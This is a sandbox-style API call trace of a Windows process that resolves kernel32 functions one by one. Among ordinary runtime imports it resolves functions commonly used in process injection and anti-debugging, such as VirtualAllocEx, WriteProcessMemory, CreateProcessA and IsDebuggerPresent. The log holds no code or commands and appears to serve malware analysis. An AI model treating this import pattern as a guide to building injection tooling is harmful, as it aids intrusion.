	[0187.661] ResetEvent (hEvent=0x8) returned 1
	[0187.661] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.663] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpiA") returned 0x76b52249
	[0187.663] ResetEvent (hEvent=0x8) returned 1
	[0187.663] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.666] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0187.666] ResetEvent (hEvent=0x8) returned 1
	[0187.666] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.668] GetProcAddress (hModule=0x76b10000, lpProcName="FlushInstructionCache") returned 0x76b523c6
	[0187.668] ResetEvent (hEvent=0x8) returned 1
	[0187.668] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.670] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibrary") returned 0x76b5d9d0
	[0187.670] ResetEvent (hEvent=0x8) returned 1
	[0187.670] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.672] GetProcAddress (hModule=0x76b10000, lpProcName="ReadProcessMemory") returned 0x76b4c1ce
	[0187.672] ResetEvent (hEvent=0x8) returned 1
	[0187.673] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.675] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAllocEx") returned 0x76b4c1b6
	[0187.675] ResetEvent (hEvent=0x8) returned 1
	[0187.675] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.677] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.677] ResetEvent (hEvent=0x8) returned 1
	[0187.677] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.679] GetProcAddress (hModule=0x76b10000, lpProcName="GetNativeSystemInfo") returned 0x76b4be77
	[0187.679] ResetEvent (hEvent=0x8) returned 1
	[0187.679] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.682] GetProcAddress (hModule=0x76b10000, lpProcName="GetVersionExA") returned 0x76b63861
	[0187.682] ResetEvent (hEvent=0x8) returned 1
	[0187.682] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.684] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryA") returned 0x76b6395c
	[0187.684] ResetEvent (hEvent=0x8) returned 1
	[0187.684] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.687] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0187.687] ResetEvent (hEvent=0x8) returned 1
	[0187.687] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.689] GetProcAddress (hModule=0x76b10000, lpProcName="ResumeThread") returned 0x76b50f1c
	[0187.689] ResetEvent (hEvent=0x8) returned 1
	[0187.689] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.691] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0187.691] ResetEvent (hEvent=0x8) returned 1
	[0187.691] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.693] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualFree") returned 0x76b61da4
	[0187.693] ResetEvent (hEvent=0x8) returned 1
	[0187.693] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.696] GetProcAddress (hModule=0x76b10000, lpProcName="SetLastError") returned 0x76b5bb08
	[0187.696] ResetEvent (hEvent=0x8) returned 1
	[0187.696] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.698] GetProcAddress (hModule=0x76b10000, lpProcName="WriteProcessMemory") returned 0x76b4c1de
	[0187.698] ResetEvent (hEvent=0x8) returned 1
	[0187.698] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.706] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0187.706] ResetEvent (hEvent=0x8) returned 1
	[0187.706] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.709] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0187.709] ResetEvent (hEvent=0x8) returned 1
	[0187.709] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.711] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileW") returned 0x76b5cc56
	[0187.711] ResetEvent (hEvent=0x8) returned 1
	[0187.711] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.713] GetProcAddress (hModule=0x76b10000, lpProcName="DecodePointer") returned 0x7738cd10
	[0187.713] ResetEvent (hEvent=0x8) returned 1
	[0187.713] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.716] GetProcAddress (hModule=0x76b10000, lpProcName="SetFilePointerEx") returned 0x76b4f5b2
	[0187.716] ResetEvent (hEvent=0x8) returned 1
	[0187.716] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.718] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleMode") returned 0x76b62412
	[0187.718] ResetEvent (hEvent=0x8) returned 1
	[0187.718] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.721] GetProcAddress (hModule=0x76b10000, lpProcName="GetConsoleCP") returned 0x76b62c8a
	[0187.721] ResetEvent (hEvent=0x8) returned 1
	[0187.721] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.723] GetProcAddress (hModule=0x76b10000, lpProcName="FlushFileBuffers") returned 0x76b47f81
	[0187.723] ResetEvent (hEvent=0x8) returned 1
	[0187.723] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.725] GetProcAddress (hModule=0x76b10000, lpProcName="SetStdHandle") returned 0x76b9f589
	[0187.725] ResetEvent (hEvent=0x8) returned 1
	[0187.725] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.728] GetProcAddress (hModule=0x76b10000, lpProcName="FreeEnvironmentStringsW") returned 0x76b61dc3
	[0187.728] ResetEvent (hEvent=0x8) returned 1
	[0187.728] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.730] GetProcAddress (hModule=0x76b10000, lpProcName="GetEnvironmentStringsW") returned 0x76b61dbc
	[0187.730] ResetEvent (hEvent=0x8) returned 1
	[0187.730] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.732] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineW") returned 0x76b6679e
	[0187.732] ResetEvent (hEvent=0x8) returned 1
	[0187.732] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.735] GetProcAddress (hModule=0x76b10000, lpProcName="GetCommandLineA") returned 0x76b698ff
	[0187.735] ResetEvent (hEvent=0x8) returned 1
	[0187.735] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.737] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0187.737] ResetEvent (hEvent=0x8) returned 1
	[0187.737] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.739] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0187.740] ResetEvent (hEvent=0x8) returned 1
	[0187.740] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.742] GetProcAddress (hModule=0x76b10000, lpProcName="GetExitCodeThread") returned 0x76b46ddd
	[0187.742] ResetEvent (hEvent=0x8) returned 1
	[0187.742] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.744] GetProcAddress (hModule=0x76b10000, lpProcName="lstrcmpA") returned 0x76b48c59
	[0187.744] ResetEvent (hEvent=0x8) returned 1
	[0187.744] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.746] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenA") returned 0x76b5a611
	[0187.746] ResetEvent (hEvent=0x8) returned 1
	[0187.746] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.749] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0187.749] ResetEvent (hEvent=0x8) returned 1
	[0187.749] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.751] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0187.751] ResetEvent (hEvent=0x8) returned 1
	[0187.751] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.753] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0187.753] ResetEvent (hEvent=0x8) returned 1
	[0187.753] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.756] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0187.756] ResetEvent (hEvent=0x8) returned 1
	[0187.756] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.758] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0187.758] ResetEvent (hEvent=0x8) returned 1
	[0187.758] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.760] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0187.760] ResetEvent (hEvent=0x8) returned 1
	[0187.760] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.763] GetProcAddress (hModule=0x76b10000, lpProcName="HeapSize") returned 0x77389bec
	[0187.763] ResetEvent (hEvent=0x8) returned 1
	[0187.763] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.765] GetProcAddress (hModule=0x76b10000, lpProcName="HeapValidate") returned 0x76b525dd
	[0187.765] ResetEvent (hEvent=0x8) returned 1
	[0187.765] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.767] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0187.767] ResetEvent (hEvent=0x8) returned 1
	[0187.767] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.769] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0187.770] ResetEvent (hEvent=0x8) returned 1
	[0187.770] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.772] GetProcAddress (hModule=0x76b10000, lpProcName="GetCPInfo") returned 0x76b61e2e
	[0187.772] ResetEvent (hEvent=0x8) returned 1
	[0187.772] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.774] GetProcAddress (hModule=0x76b10000, lpProcName="GetOEMCP") returned 0x76b53db9
	[0187.774] ResetEvent (hEvent=0x8) returned 1
	[0187.774] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.776] GetProcAddress (hModule=0x76b10000, lpProcName="IsValidCodePage") returned 0x76b6c1c0
	[0187.776] ResetEvent (hEvent=0x8) returned 1
	[0187.776] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.779] GetProcAddress (hModule=0x76b10000, lpProcName="FindFirstFileExA") returned 0x76b9f3ef
	[0187.779] ResetEvent (hEvent=0x8) returned 1
	[0187.779] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.782] GetProcAddress (hModule=0x76b10000, lpProcName="FindClose") returned 0x76b60e62
	[0187.782] ResetEvent (hEvent=0x8) returned 1
	[0187.782] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.785] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0187.785] ResetEvent (hEvent=0x8) returned 1
	[0187.785] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.788] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0187.788] ResetEvent (hEvent=0x8) returned 1
	[0187.788] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.790] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0187.790] ResetEvent (hEvent=0x8) returned 1
	[0187.790] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.792] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0187.792] ResetEvent (hEvent=0x8) returned 1
	[0187.792] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.794] GetProcAddress (hModule=0x76b10000, lpProcName="IsProcessorFeaturePresent") returned 0x76b676b5
	[0187.794] ResetEvent (hEvent=0x8) returned 1
	[0187.794] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.796] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0187.796] ResetEvent (hEvent=0x8) returned 1
	[0187.797] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.799] GetProcAddress (hModule=0x76b10000, lpProcName="GetStartupInfoW") returned 0x76b63891
	[0187.799] ResetEvent (hEvent=0x8) returned 1
	[0187.799] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.801] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0187.801] ResetEvent (hEvent=0x8) returned 1
	[0187.801] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.803] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0187.803] ResetEvent (hEvent=0x8) returned 1
	[0187.803] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.805] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0187.805] ResetEvent (hEvent=0x8) returned 1
	[0187.805] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.807] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0187.807] ResetEvent (hEvent=0x8) returned 1
	[0187.807] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.809] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0187.809] ResetEvent (hEvent=0x8) returned 1
	[0187.809] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.812] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSListHead") returned 0x77395eeb
	[0187.812] ResetEvent (hEvent=0x8) returned 1
	[0187.812] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.814] GetProcAddress (hModule=0x76b10000, lpProcName="ReadFile") returned 0x76b596fb
	[0187.814] ResetEvent (hEvent=0x8) returned 1
	[0187.814] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.816] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileSizeEx") returned 0x76b559ef
	[0187.816] ResetEvent (hEvent=0x8) returned 1
	[0187.816] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.818] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualQuery") returned 0x76b676d6
	[0187.818] ResetEvent (hEvent=0x8) returned 1
	[0187.818] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.820] GetProcAddress (hModule=0x76b10000, lpProcName="FindFirstFileA") returned 0x76b62d89
	[0187.820] ResetEvent (hEvent=0x8) returned 1
	[0187.821] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.823] GetProcAddress (hModule=0x76b10000, lpProcName="FindNextFileA") returned 0x76b5a187
	[0187.823] ResetEvent (hEvent=0x8) returned 1
	[0187.823] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.825] GetProcAddress (hModule=0x76b10000, lpProcName="CreateFileA") returned 0x76b5cee8
	[0187.825] ResetEvent (hEvent=0x8) returned 1
	[0187.825] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.827] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteFileA") returned 0x76b547cb
	[0187.827] ResetEvent (hEvent=0x8) returned 1
	[0187.827] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.830] GetProcAddress (hModule=0x76b10000, lpProcName="SystemTimeToFileTime") returned 0x76b5cecb
	[0187.830] ResetEvent (hEvent=0x8) returned 1
	[0187.830] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.832] GetProcAddress (hModule=0x76b10000, lpProcName="Process32First") returned 0x76b7443d
	[0187.832] ResetEvent (hEvent=0x8) returned 1
	[0187.832] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.834] GetProcAddress (hModule=0x76b10000, lpProcName="OpenProcess") returned 0x76b559d7
	[0187.834] ResetEvent (hEvent=0x8) returned 1
	[0187.834] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.837] GetProcAddress (hModule=0x76b10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76b4f731
	[0187.837] ResetEvent (hEvent=0x8) returned 1
	[0187.837] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.839] GetProcAddress (hModule=0x76b10000, lpProcName="ProcessIdToSessionId") returned 0x76b5b744
	[0187.840] ResetEvent (hEvent=0x8) returned 1
	[0187.840] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.842] GetProcAddress (hModule=0x76b10000, lpProcName="GlobalAlloc") returned 0x76b59ce1
	[0187.842] ResetEvent (hEvent=0x8) returned 1
	[0187.842] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.845] GetProcAddress (hModule=0x76b10000, lpProcName="Process32Next") returned 0x76b74505
	[0187.845] ResetEvent (hEvent=0x8) returned 1
	[0187.845] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.847] GetProcAddress (hModule=0x76b10000, lpProcName="GlobalFree") returned 0x76b59cf9
	[0187.847] ResetEvent (hEvent=0x8) returned 1
	[0187.847] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.849] GetProcAddress (hModule=0x76b10000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x76b4480b
	[0187.850] ResetEvent (hEvent=0x8) returned 1
	[0187.850] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.852] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateThread") returned 0x76b622a7
	[0187.852] ResetEvent (hEvent=0x8) returned 1
	[0187.852] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.854] GetProcAddress (hModule=0x76b10000, lpProcName="CreateProcessA") returned 0x76b12082
	[0187.854] ResetEvent (hEvent=0x8) returned 1
	[0187.854] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.857] GetProcAddress (hModule=0x76b10000, lpProcName="IsWow64Process") returned 0x76b54785
	[0187.857] ResetEvent (hEvent=0x8) returned 1
	[0187.857] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.859] GetProcAddress (hModule=0x76b10000, lpProcName="WriteFile") returned 0x76b61400
	[0187.859] ResetEvent (hEvent=0x8) returned 1
	[0187.859] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.862] GetProcAddress (hModule=0x76b10000, lpProcName="SetFilePointer") returned 0x76b5db36
	[0187.862] ResetEvent (hEvent=0x8) returned 1
	[0187.862] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.865] GetProcAddress (hModule=0x76b10000, lpProcName="SetEndOfFile") returned 0x76b52319
	[0187.865] ResetEvent (hEvent=0x8) returned 1
	[0187.865] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.868] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualProtectEx") returned 0x76b9f5d9
	[0187.868] ResetEvent (hEvent=0x8) returned 1
	[0187.868] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.870] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileSize") returned 0x76b50273
	[0187.870] ResetEvent (hEvent=0x8) returned 1
	[0187.870] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.872] GetProcAddress (hModule=0x76b10000, lpProcName="CreateNamedPipeA") returned 0x76b9d44f
	[0187.872] ResetEvent (hEvent=0x8) returned 1
	[0187.872] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.875] GetProcAddress (hModule=0x76b10000, lpProcName="EncodePointer") returned 0x7738a295
	[0187.875] ResetEvent (hEvent=0x8) returned 1
	[0187.875] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.877] GetProcAddress (hModule=0x76b10000, lpProcName="RaiseException") returned 0x76b4eb60
	[0187.877] ResetEvent (hEvent=0x8) returned 1
	[0187.877] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.879] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedFlushSList") returned 0x77383129
	[0187.879] ResetEvent (hEvent=0x8) returned 1
	[0187.879] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.881] GetProcAddress (hModule=0x76b10000, lpProcName="RtlUnwind") returned 0x76b47f70
	[0187.881] ResetEvent (hEvent=0x8) returned 1
	[0187.881] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.884] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76b63939
	[0187.884] ResetEvent (hEvent=0x8) returned 1
	[0187.884] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.886] GetProcAddress (hModule=0x76b10000, lpProcName="TlsAlloc") returned 0x76b635a1
	[0187.886] ResetEvent (hEvent=0x8) returned 1
	[0187.886] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.888] GetProcAddress (hModule=0x76b10000, lpProcName="TlsGetValue") returned 0x76b5da70
	[0187.888] ResetEvent (hEvent=0x8) returned 1
	[0187.888] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.891] GetProcAddress (hModule=0x76b10000, lpProcName="TlsSetValue") returned 0x76b5da88
	[0187.891] ResetEvent (hEvent=0x8) returned 1
